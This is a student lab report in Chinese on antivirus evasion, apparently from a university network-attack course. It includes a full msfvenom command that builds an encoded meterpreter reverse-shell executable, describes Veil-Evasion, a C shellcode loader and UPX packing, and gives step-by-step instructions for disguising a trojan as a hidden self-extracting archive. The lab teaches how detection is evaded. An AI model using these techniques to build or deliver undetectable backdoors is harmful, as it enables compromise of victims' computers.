2017-2018-2 20155303 『網絡對抗技術』Exp3：免殺原理與實踐

2017-2018-2 20155303 『網絡對抗技術』Exp3：免殺原理與實踐

————————CONTENTS————————

• 1. 免殺原理與實踐說明
  • 實驗說明
  • 基礎問題回答
• 2. 使用msf編碼器生成後門程序及檢測
• 3. 使用veil-evasion生成後門程序及檢測
• 4. 使用shellcode生成後門程序並檢測
• 5. 實驗中遇到的問題及思考
  • 嘗試點其餘有趣的？——自解壓捆綁木馬
  • 一樣的病毒，不一樣的殺軟殺出來不同的結果？
• 6. 實驗總結及體會
• 附：參考資料

---

1. 免殺原理與實踐說明

1、實驗說明

• 任務一：正確使用msf編碼器，msfvenom生成如jar之類的其餘文件，veil-evasion，本身利用shellcode編程等免殺工具或技巧；(1.5分)

• 任務二：經過組合應用各類技術實現惡意代碼免殺(1分)

• 任務三：用另外一電腦實測，在殺軟開啓的狀況下，可運行並回連成功，註明電腦的殺軟名稱與版本（1分）

2、基礎問題回答

• 問：殺軟是如何檢測出惡意代碼的？
  • 基於特徵來檢測：惡意代碼中通常會有一段有較明顯特徵的代碼也就是特徵碼，若是殺毒軟件檢測到有程序包含的特徵碼與其特徵碼庫的代碼相匹配，就會把該程序看成惡意軟件。
  • 基於行爲來檢測：經過對惡意代碼的觀察、研究，有一些行爲是惡意代碼的共同行爲，並且比較特殊。因此當一個程序在運行時，殺毒軟件會監視其行爲，若是發現了這種特殊的行爲，則會把它當成惡意軟件。
• 問：免殺是作什麼？
  • 經過使用一些技術手段，讓殺毒軟件沒法識別並分析主機中的惡意代碼。
• 問：免殺的基本方法有哪些？
  • 改變特徵碼：
    • 只有exe——加殼
    • 有shellcode——利用shellcode生成可執行文件
    • 有源代碼——用其餘語言重寫再編譯
  • 改變行爲：
    • 通信方式：儘可能使用反彈式鏈接、使用隧道技術、加密通信數據等。
    • 操做模式：基於內存操做、減小對系統的修改、加入混淆做用的正常功能代碼等。

返回目錄

---

2. 使用msf編碼器生成後門程序及檢測

一、在《Exp2：後門原理與實踐》博客中，咱們生成了一個後門文件。將其放在virscan.org中進行掃描，結果以下圖所示：

能夠看出，39款殺軟中有20款報出了病毒。緣由也可想而知，Msfvenom是Metasploit平臺下用來編碼payloads免殺的工具。以Metaspliot的知名度和普及度，只要一有新編碼算法，立刻就會加到特徵庫裏了。

二、使用msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=xxx LPORT=xxx -f exe > met-encoded10.exe指令進行屢次編碼：

再使用virscan.org進行掃描，結果以下所示：

仍然有19款殺軟發現病毒。並無什麼卵用。屢次編碼以後的後門，仍是會被大多數殺軟發現並清理的。

返回目錄

---

3. 使用veil-evasion生成後門程序及檢測

安裝veil-evasion的時候遇到了好多麻煩事，網速賊慢，好不容易下載好了，「展開對象」執行了倆小時還沒結束，去網上也搜不到相關的緣由和解釋，最終仍是拷貝了老師的虛擬機。

一、啓動evail-evasion，設置好回連的IP地址和端口號後，生成後門文件：

二、放到virscan.org上掃描一下：

比以前用msf生成的文件報毒率低，但仍是會被殺軟檢測出來。

返回目錄

---

4. 注入Shellcode並執行

在《Exp2：後門原理與實踐》博客中，一樣介紹了生成shellcode的方法，此次咱們利用生成的shellcode編寫後門程序，半手工打造惡意軟件。

一、生成的shellcode以下圖所示：

二、利用shellcode編寫一個C語言程序後門，在windows下編譯運行後，測試其可用性：

能夠看到，成功獲取了windows權限。

三、不幸的是，仍是被殺毒軟件發現了：

四、掃描發現，仍有20%的殺軟可以掃描出來：

五、再進行加殼嘗試吧。使用UPX對生成的後門程序加殼：

六、殺軟沒有發現它，掃描結果也比較樂觀：

七、測試仍然可用：

返回目錄

---

5. 實驗中遇到的問題及思考

1、嘗試點其餘有趣的？——自解壓捆綁木馬

隨着人們對木馬的瞭解和防範意識的加強，木馬設計者們開發出了更多的功能來假裝木馬，以達到下降用戶警覺的目的。經常使用的假裝手段有：

• 修改圖標：將木馬服務端程序的圖標改爲HTML、TXT、ZIP等文件格式的圖標，使其具備迷惑性。
• 文件捆綁：將木馬捆綁到一個安裝程序上，當安裝程序運行時，木馬便會在用戶毫無察覺的狀況下進入系統。被捆綁的文件通常是可執行文件（如EXE、COM等格式的文件），迷惑性很大。即便重裝了系統，若是系統中還安裝了那個程序，就頗有可能再次中招。
• 更改木馬服務端程序的名稱：大多數改成與系統文件相似的名字，好比windows.exe啦，或者把後綴改成d11以模仿dll文件之類的。
• ......

在這裏，咱們來嘗試製做自解壓捆綁木馬。

一、將要捆綁的文件們放在同一個文件夾下，右擊選擇「添加到壓縮文件」

二、設置壓縮參數。起一個有趣的名字，並勾選上「建立自解壓格式壓縮文件」複選框。

三、切換至「高級」選項卡，點擊「自解壓選項」，選中「模式」中的「所有隱藏」並肯定。

四、再打開「文本和圖標」選項卡，填寫「自解壓文件窗口標題」和「自解壓文件窗口中顯示的文本」，並找一個有趣的圖標做爲這個自解壓文件的圖標，好比下面這個比較符合「Linux軟件教程」氣質的圖標：

點擊肯定按鈕。

五、這樣一來，咱們就生成了一個看起來很是正經的自解壓的壓縮文件。

六、放到virscan.org試一下，雖然說仍是會被部分殺軟發現，但機率下降了不少~

2、一樣的病毒，不一樣的殺軟殺出來不同的結果？

在virscan.org上面檢測的過程當中，發現雖然上傳的是一個文件，但不一樣的殺毒軟件，掃描結果不盡相同。這是爲何呢？掃描出來的結果都是些什麼呢？

查閱資料瞭解到，這是由於不一樣的殺毒軟件病毒庫不徹底相同，殺毒引擎不同，另外，不一樣的軟件功臣是對病毒、系統漏洞的理解也不盡相同。這就形成了殺軟結果的千差萬別。

返回目錄

---

5. 實驗總結及體會

• 離實戰還缺什麼步驟？
  • 實驗中的後門程序都是咱們生硬地複製粘貼到靶機上的，但實際攻擊的時候怎麼可能乖乖讓咱們把一個赤裸裸的木馬放過去？！因此這就用到了一些木馬假裝技術，包括木馬捆綁、自解壓木馬、CHM木馬等等，課下也進行了淺顯的瞭解和練習，發現的確離實戰還有很長一段路要走...
• 此次實驗仍是一如既往的有趣，無論是平臺生成仍是手工打造，能生成一個不被殺軟發現的後門程序仍是有些難度的，須要在不斷的摸索中一點一點嘗試。雖然這次實驗很是基礎，對一些現有平臺的依賴性仍然很強，但倒是一個良好的開端，可以爲咱們進一步深刻研究免殺提供思路。
• 打造免殺軟件的過程也增長了危機意識，殺軟殺不出來不表明絕對安全。想生成一個不被發現的後門其實也不是什麼難事。因此平日要提升安全意識，不要隨便在網上下載可執行文件，也不要點擊可疑連接，儘可能減小被植入後門的可能。

返回目錄

---

附：參考資料

• MAL_免殺原理與實踐
• kali下的免殺之veil安裝步驟
• VirSCAN.org
• VirusTotal
• 常見病毒種類與殺毒軟件分析